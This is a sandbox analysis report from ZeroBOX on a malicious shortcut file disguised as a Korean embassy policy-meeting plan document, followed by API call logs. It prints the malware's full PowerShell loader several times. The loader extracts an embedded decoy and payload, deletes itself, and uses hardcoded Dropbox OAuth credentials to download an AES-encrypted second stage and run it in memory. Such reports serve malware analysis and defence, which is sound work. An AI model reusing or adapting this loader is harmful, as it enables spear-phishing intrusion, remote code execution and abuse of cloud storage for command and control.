Summary | ZeroBOX

202404_주중한국대사관 한중 북중·안보현안 1.5트랙 비공개 정책간담회 대면회의 계획(안).hwp.lnk

Generic Malware, Antivirus, GIF Format, AntiDebug, MSOffice File, Lnk Format, AntiVM, PowerShell, HWP
Category FILE
Machine s1_win7_x6401
Started Aug. 21, 2024, 2:23 p.m.
Completed Aug. 21, 2024, 2:26 p.m.
Size 1.1MB
Type MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5 a4bd6d00abbd79ab00161ff538cfe703
SHA256 fe156159a26f8b7c140db61dd8b136e1c8103a800748fe9b70a3a3fdf179d3c3
CRC32 13D93C04
ssdeep 1536:LCNrr8wc73ExbcrIoHXnTKZva0CfkTYcIJex+155sB:LCNrr8wc73ExbcrIUnTKUfkiH54
Yara
  • HWP_file_format - HWP Document File
  • Microsoft_Office_File_Zero - Microsoft Office File
  • lnk_file_format - Microsoft Windows Shortcut File Format
  • Lnk_Format_Zero - LNK Format

  • cmd.exe (PID 2548) "C:\Windows\System32\cmd.exe" /c start /wait "puWJNPHefC" "C:\Users\test22\AppData\Local\Temp\202404_주중한국대사관 한중 북중·안보현안 1.5트랙 비공개 정책간담회 대면회의 계획(안).hwp.lnk"

    • cmd.exe (PID 2660) "C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\test22\AppData\Local\Temp\tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1110496;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp27gytekx9jfq\";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/step5/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"

      • powershell.exe (PID 2764) powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\test22\AppData\Local\Temp\tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1110496;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp27gytekx9jfq\";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/step5/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"

IP Address Status Action
162.125.80.14 Active Moloch
164.124.101.2 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: readfileend
console_handle: 0x0000001f
1 1 0

WriteConsoleW

buffer: exestart
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: exeend
console_handle: 0x0000001f
1 1 0

WriteConsoleW

buffer: The term 'Invoke-RestMethod' is not recognized as the name of a cmdlet, functio
console_handle: 0x00000033
1 1 0

WriteConsoleW

buffer: n, script file, or operable program. Check the spelling of the name, or if a pa
console_handle: 0x0000003f
1 1 0

WriteConsoleW

buffer: th was included, verify that the path is correct and try again.
console_handle: 0x0000004b
1 1 0

WriteConsoleW

buffer: At line:1 char:2157
console_handle: 0x00000057
1 1 0

WriteConsoleW

buffer: + $tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;fo
console_handle: 0x00000063
1 1 0

WriteConsoleW

buffer: reach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path
console_handle: 0x0000006f
1 1 0

WriteConsoleW

buffer: ;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Obje
console_handle: 0x0000007b
1 1 0

WriteConsoleW

buffer: ct System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::
console_handle: 0x00000087
1 1 0

WriteConsoleW

buffer: Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file
console_handle: 0x00000093
1 1 0

WriteConsoleW

buffer: ,0,$file.Length);$InputStream.Dispose();write-host "readfileend";$path = $lnkpa
console_handle: 0x0000009f
1 1 0

WriteConsoleW

buffer: th.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\test22\AppData\Local\Temp\
console_handle: 0x000000ab
1 1 0

WriteConsoleW

buffer: tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1
console_handle: 0x000000b7
1 1 0

WriteConsoleW

buffer: 110496;$temp = New-Object Byte[]($len2-$len1);write-host "exestart";for($i=$len
console_handle: 0x000000c3
1 1 0

WriteConsoleW

buffer: 1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp)
console_handle: 0x000000cf
1 1 0

WriteConsoleW

buffer: -Encoding Byte;write-host "exeend";$temp = New-Object Byte[]($file.Length-$len3
console_handle: 0x000000db
1 1 0

WriteConsoleW

buffer: );for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $enc
console_handle: 0x000000e7
1 1 0

WriteConsoleW

buffer: Data_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Fun
console_handle: 0x000000f3
1 1 0

WriteConsoleW

buffer: ction AESDecrypt { param ( [Byte[]]$bytes,[String]$pass="pa55w0rd") $InputStrea
console_handle: 0x000000ff
1 1 0

WriteConsoleW

buffer: m = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object Syste
console_handle: 0x0000010b
1 1 0

WriteConsoleW

buffer: m.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read(
console_handle: 0x00000117
1 1 0

WriteConsoleW

buffer: $Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = N
console_handle: 0x00000123
1 1 0

WriteConsoleW

buffer: ew-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey
console_handle: 0x0000012f
1 1 0

WriteConsoleW

buffer: = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Securit
console_handle: 0x0000013b
1 1 0

WriteConsoleW

buffer: y.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoS
console_handle: 0x00000147
1 1 0

WriteConsoleW

buffer: tream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec
console_handle: 0x00000153
1 1 0

WriteConsoleW

buffer: , [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($
console_handle: 0x0000015f
1 1 0

WriteConsoleW

buffer: OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientI
console_handle: 0x0000016b
1 1 0

WriteConsoleW

buffer: D = "oj8kd1lzqrw7v3m";$clientSecret = "vwp27gytekx9jfq";$refreshToken = "wR3_UL
console_handle: 0x00000177
1 1 0

WriteConsoleW

buffer: k2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u";$body = @{grant_typ
console_handle: 0x00000183
1 1 0

WriteConsoleW

buffer: e="refresh_token";refresh_token=$refreshToken;client_id=$clientID;client_secret
console_handle: 0x0000018f
1 1 0

WriteConsoleW

buffer: =$clientSecret};$tokenEndpoint = "https://api.dropboxapi.com/oauth2/token";$res
console_handle: 0x0000019b
1 1 0

WriteConsoleW

buffer: ponse = Invoke-RestMethod <<<< -Uri $tokenEndpoint -Method Post -Body $body;if
console_handle: 0x000001a7
1 1 0

WriteConsoleW

buffer: ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl
console_handle: 0x000001b3
1 1 0

WriteConsoleW

buffer: = "https://content.dropboxapi.com/2/files/download";$remoteFilePath = "/step5/p
console_handle: 0x000001bf
1 1 0

WriteConsoleW

buffer: s.bin";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Me
console_handle: 0x000001cb
1 1 0

WriteConsoleW

buffer: thod = "POST";$request.Headers.Add("Authorization", "Bearer $accessToken");$req
console_handle: 0x000001d7
1 1 0

WriteConsoleW

buffer: uest.Headers.Add("Dropbox-API-Arg", '{"path": "' + $remoteFilePath + '"}');$res
console_handle: 0x000001e3
1 1 0

WriteConsoleW

buffer: ponse = $request.GetResponse();$receiveStream = $response.GetResponseStream();$
console_handle: 0x000001ef
1 1 0

WriteConsoleW

buffer: pass = "pa55w0rd";if ($receiveStream -ne $null) {$streamReader = New-Object Sys
console_handle: 0x000001fb
1 1 0

WriteConsoleW

buffer: tem.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.Memory
console_handle: 0x00000207
1 1 0

WriteConsoleW

buffer: Stream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.R
console_handle: 0x00000213
1 1 0

WriteConsoleW

buffer: ead($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while
console_handle: 0x0000021f
1 1 0

WriteConsoleW

buffer: ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -byt
console_handle: 0x0000022b
1 1 0

WriteConsoleW

buffer: es $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($
console_handle: 0x00000237
1 1 0

WriteConsoleW

buffer: dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiv
console_handle: 0x00000243
1 1 0

WriteConsoleW

buffer: eStream.Close();$response.Close();
console_handle: 0x0000024f
1 1 0

WriteConsoleW

buffer: + CategoryInfo : ObjectNotFound: (Invoke-RestMethod:String) [], C
console_handle: 0x0000025b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1350
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a17d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a17d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a17d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1a50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1a50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1a50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1a50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1a50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1a50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1910
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1910
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1910
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a17d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a17d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a17d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1950
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a17d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a17d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a17d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a17d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a17d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a17d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a17d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1ad0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1ad0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1ad0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1ad0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1ad0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1ad0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1ad0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1ad0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1ad0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1ad0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1ad0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1ad0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1ad0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1ad0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1b90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1b90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1b90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1b90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1b90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1b90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1b90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1b90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1b90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1dd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1dd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a1dd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 2228224
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02990000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2764
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f5a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2764
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f52000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02672000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b71000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b72000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0269a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02673000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02674000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f5b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02692000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02675000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0269c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2764
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

